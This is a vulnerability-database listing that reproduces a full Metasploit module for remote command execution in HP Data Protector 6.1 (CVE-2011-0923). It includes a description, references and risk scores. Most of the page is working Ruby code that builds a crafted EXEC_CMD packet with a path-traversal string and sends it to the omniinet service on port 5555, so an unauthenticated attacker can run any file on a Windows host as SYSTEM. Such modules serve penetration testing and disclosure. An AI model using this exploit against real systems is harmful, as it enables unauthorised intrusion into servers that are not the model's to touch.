Lucene search
K

HP Data Protector 6.1 EXEC_CMD Command Execution

🗓️ 23 Mar 2012 12:57:13Reported by ch0ks, c4an, wireghoul, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 40 Views

HP Data Protector 6.1 EXEC_CMD Command Execution. Exploits omniinet process on Windows

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP Data Protector 6.1 EXEC_CMD Command Execution',
      'Description'    => %q{
        This module exploits HP Data Protector's omniinet process, specifically
        against a Windows setup.

        When an EXEC_CMD packet is sent, omniinet.exe will attempt to look
        for that user-supplied filename with kernel32!FindFirstFileW().  If the file
        is found, the process will then go ahead execute it with CreateProcess()
        under a new thread.  If the filename isn't found, FindFirstFileW() will throw
        an error (0x03), and then bails early without triggering CreateProcess().

        Because of these behaviors, if you try to supply an argument, FindFirstFileW()
        will look at that as part of the filename, and then bail.

        Please note that when you specify the 'CMD' option, the base path begins
        under C:\.
      },
      'References'     =>
        [
          [ 'CVE', '2011-0923' ],
          [ 'OSVDB', '72526' ],
          [ 'ZDI', '11-055' ],
          [ 'URL', 'https://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux/' ]
        ],
      'Author'         =>
        [
          'ch0ks',     # poc
          'c4an',      # msf poc (linux)
          'wireghoul', # Improved msf (linux)
          'sinn3r'
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2011-02-07'
    ))

    register_options(
      [
        Opt::RPORT(5555),
        OptString.new("CMD", [true, 'File to execute', 'Windows\System32\calc.exe'])
      ])
  end


  def run
    cmd = datastore['CMD']
    cmd << "\x00"*25
    cmd << "\n"

    user = Rex::Text.rand_text_alpha(4)

    packet = "\x00\x00\x00\xa4\x20\x32\x00\x20"
    packet << user*2
    packet << "\x00\x20\x30\x00\x20"
    packet << "SYSTEM"
    packet << "\x00\x20\x63\x34\x61\x6e"
    packet << "\x20\x20\x20\x20\x20\x00\x20\x43\x00\x20\x32\x30\x00\x20"
    packet << user
    packet << "\x20\x20\x20\x20\x00\x20"
    packet << "\x50\x6f\x63"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20\x30\x00\x20\x30\x00\x20"
    packet << "../../../../../../../../../../"
    packet << cmd

    begin
      print_status("#{rhost}:#{rport} - Sending command...")
      connect
      sock.put(packet)
      res = sock.get_once
      print_status(res.to_s) if res and not res.empty?
    rescue
      print_error("#{rhost}:#{rport} - Unable to connect")
    ensure
      disconnect
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Feb 2022 23:22Current
7.2High risk
Vulners AI Score7.2
CVSS 210
EPSS0.81081
40